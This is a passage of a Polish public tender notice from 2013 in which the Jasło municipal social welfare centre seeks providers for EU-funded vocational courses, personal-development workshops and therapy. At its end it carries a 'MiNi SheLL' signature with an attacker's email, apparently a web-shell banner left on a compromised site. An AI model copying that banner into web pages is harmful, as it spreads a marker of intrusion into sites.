Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsjaslo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Jaśle, ul. Kochanowskiego 3, 38-200 Jasło, pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2013 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Jaśle, ul. Kochanowskiego 3, 38-200 Jasło, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Zadanie nr 1: Kurs opiekunka dzieci i osób starszych z językiem angielskim:
- Liczba uczestników: 5 (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 4 i nie więcej niż 6),
- Czas trwania: 120 godzin edukacyjnych, w tym 20 godzin lektoratu z języka angielskiego (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu między 8.00 a 18.00 (z wyłączeniem niedziel),
- Termin realizacji: od lipca do 7.09.2013 r.,
- Cel kursu: przygotowanie uczestników do pracy na stanowisku opiekunki dzieci i osób starszych z podstawami języka angielskiego,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9a do SIWZ.
b) Zadanie nr 2: Kurs fryzjerski:
- Liczba uczestników: 4 (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 3 i nie więcej niż 5), 
- Czas trwania: 120 godzin edukacyjnych, (1 godzina zajęć równa jest 45 minutom), na które składają się zajęcia teoretyczne (20 godz.) oraz zajęcia praktyczne (100 godz.), realizowanych maksymalnie 6 dni w tygodniu  między 8.00 a 18.00 (z wyłączeniem niedziel),
- Termin realizacji: od lipca do 7.09.2013 r.
- Cel i problematyka kursu: celem kursu jest zapoznanie z pracą fryzjera, oraz przekazanie wiedzy teoretycznej i praktycznej na poziomie podstawowym z zakresu fryzjerstwa,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Zadanie nr 1: Kurs Administracyjno-biurowy:
- Liczba uczestników: 7 (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 6 i nie więcej niż 8),
- Czas trwania: 120 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu między 8.00 a 18.00 (z wyłączeniem niedziel),
- Termin realizacji: od lipca do 7.09.2013 r.,
- Cel i problematyka kursu: Celem kursu jest zdobycie podstawowej wiedzy  z zakresu: zasad funkcjonowania biura firmy i organizacji pracy biurowej, praktycznych umiejętności samodzielnego prowadzenia biura,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9b do SIWZ.
b) Zadanie nr 2: Kurs Florystyka z obsługą kas fiskalnych:
- Liczba uczestników: 33 osoby (2 grupy; Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 31 i nie więcej niż 35).
- Czas trwania: 100 godzin edukacyjnych, w tym 20 godzin teoretycznej i praktycznej obsługi kasy fiskalnej (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu  między 8.00 a 16.00 (z wyłączeniem niedziel).
- Termin realizacji: od lipca do 7.09.2013 r.
- Cel i problematyka kursu: zdobycie przez uczestników kursu wiedzy z zakresu florystyki oraz umiejętności obsługi kasy fiskalnej.
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Zadanie nr 1: Warsztaty Samozatrudnienie-zakładanie spółdzielni socjalnych wraz z wizytą studyjną do spółdzielni socjalnej:
- Liczba uczestników:  14 osób (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 13 i nie więcej niż 15),
- Czas trwania: 30 godzin edukacyjnych obejmujących zajęcia teoretyczne (1 godzina zajęć równa jest 45 minutom) w godzinach pomiędzy 8:00 a 18:00. oraz 2 dni wizyty studyjnej,
- Termin realizacji warsztatów: od 9 września do 15 września 2013 r.,
- Cel warsztatów: Celem warsztatów jest nabycie wiedzy i umiejętności dotyczących założenia i prowadzenie spółdzielni socjalnej,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9c do SIWZ.
b) Zadanie nr 2: Kurs Kucharz - pizzer - kelner:
- Liczba uczestników:  19 (2 grupy szkoleniowe; Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 18 i nie więcej niż 20). 
- Czas trwania: 150 godzin edukacyjnych, w tym 100 godzin praktycznych (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu  między 8.00 a 18.00 (z wyłączeniem niedziel).
- Termin realizacji: lipiec-sierpień 2013 r.
- Cel i problematyka kursu: teoretyczne i praktyczne przygotowanie jego uczestników do pracy w zawodzie kucharz- pizzer- kelner. 
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Zadanie nr 1: Mnemotechniki:
- Liczba uczestników:  20 osób (dwie grupy: pierwsza -10 osób, druga -10 osób; Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób ale nie mniej niż 19 i nie więcej niż 21),
- Czas trwania: 20 godzin edukacyjnych obejmujących zajęcia praktyczne oraz teoretyczne (1 godzina zajęć równa jest 45 minutom) realizowanych:
a. pierwsza grupa: listopad 2013 r. od poniedziałku do piątku od godziny 8:00 do 16:00,
b. druga grupa: listopad 2013 r. w soboty od godziny 8:00 do 18:00.
- Cel warsztatów: Celem jest nabycie wiedzy i umiejętności w zakresie skutecznych technologii uczenia się,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9d do SIWZ.
b) Zadanie nr 2: Trening samooceny i poczucia własnej wartości:
- Liczba uczestników:  25 osób (dwie grupy: pierwsza -16 osób, druga -9 osób w 2013r.; Zamawiający zastrzega sobie możliwość skierowania mniejszej lub większej liczby osób, ale nie mniej niż 24 i nie więcej niż 26 osób),
- Czas trwania i termin realizacji: 20 godzin edukacyjnych obejmujących zajęcia praktyczne oraz teoretyczne (1 godzina zajęć równa jest 45 minutom) realizowanych:
a. pierwsza grupa: w okresie od 1 października do 14 października 
2013 r. godzinach od 8:00 do 16:00 od poniedziałku do piątku,
b. druga grupa: październik 2013 r. w soboty od 8:00 do 18:00.
- Cel treningu: celem będzie rozwijanie samoświadomości, poszerzanie świadomości własnych zalet, stworzenie okazji do twórczej ekspresji własnej osobowości, zachęcanie do pozytywnego myślenia i mówienia o sobie i innych oraz wzmacnianie poczucia własnej wartości,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9d do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Zadanie nr 1: Warsztaty z dziedziny rozwoju osobistego (zajęcia kreatywności połączone z arteterapią i ergoterapią):
- Liczba uczestników:  20 (1 grupa szkoleniowa - Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, ale nie mniej niż 18 ii nie więcej niż 21 osób),
- Czas trwania: 38 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) realizowanych maksymalnie 6 dni w tygodniu (z wyłączeniem niedziel) między 8.00 a 16.00,
- Termin realizacji: od 1 września do 14 września 2013 r.,
- Cel i problematyka warsztatów: Celem będzie przywrócenie sprawności życiowej uczestników projektu. Stosowane na warsztatach metody terapii psychospołecznej pozwolą m.in. na zmniejszenie napięcia w stanach depresyjnych i lękowych, stworzenie u chorego poczucia własnej wartości oraz rozszerzenia kręgu zainteresowań, wzbogacenie jego życia emocjonalnego i aktywizacj, 
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9e do SIWZ.
b) Zadanie nr 2: Warsztaty wychowawcze:
- Liczba uczestników: 23 osoby (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, ale nie mniej niż 21 i nie więcej niż 25 osób),
- Czas trwania: 40 godzin edukacyjnych (1 godzina zajęć równa jest 45 minutom) obejmujących zajęcia praktyczne oraz teoretyczne - realizowanych maksymalnie przez 5 dni w tygodniu  między godziną 8:00 a 18:00 (z wyłączeniem sobót i niedziel), obejmujących nie więcej niż 8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć edukacyjnych, jak i przerwy między zajęciami,
- Termin realizacji warsztatów: październik - listopad 2013 r.,
- Cel warsztatów: Celem warsztatów będzie rozwijanie umiejętności wychowawczych poprzez wzrost wiedzy z zakresu specyfiki funkcjonowania dziecka oraz rozwój kompetencji rodzicielskich, 
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9e do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.34.00.00-9, 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Zadanie nr 1: Indywidualna terapia psychologiczna:
- Liczba uczestników: 6 osób (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, ale nie mniej niż 4 i nie więcej niż 7 osób),
- Czas trwania: po 10 godzin na osobę (6 osób),
- Termin realizacji: od sierpnia do grudnia 2013 r.,
- Cel: celem terapii jest wspomaganie funkcjonowania jednostki w codziennym życiu, zwiększenie skuteczności działania, wspieranie w osobistym rozwoju,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9f do SIWZ.
b) Zadanie nr 2: Terapia rodzin:
- Liczba uczestników: 3 osoby (Zamawiający zastrzega sobie skierowanie mniejszej lub większej liczby osób, nie mniej niż 2 i nie więcej niż 4 osoby),
- Czas trwania: 3 osoby jeden raz w miesiącu począwszy od sierpnia 2013 do grudnia 2013 (5 sesji po 1,5 godziny zegarowej na osobę),
- Termin realizacji: od sierpnia do grudnia 2013 r.,
- Cel: przepracowanie trudności i rozwiązanie konfliktów, które powodują pogorszenie relacji i życia w rodzinie. Omawianie problemów wspólnie z terapeutą daje możliwość odkrycia przyczyny trudności, znalezienia nowej perspektywy ich rozwiązania, wzmocnienia zasobów, wzajemnego zrozumienia czy wypracowania konstruktywnych zmian,
- Zakres: szczegółowy opis, wymagania oraz zakres przedmiotu zamówienia odnośnie niniejszego zadania - w załączniku nr 9f do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6, 85.31.24.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com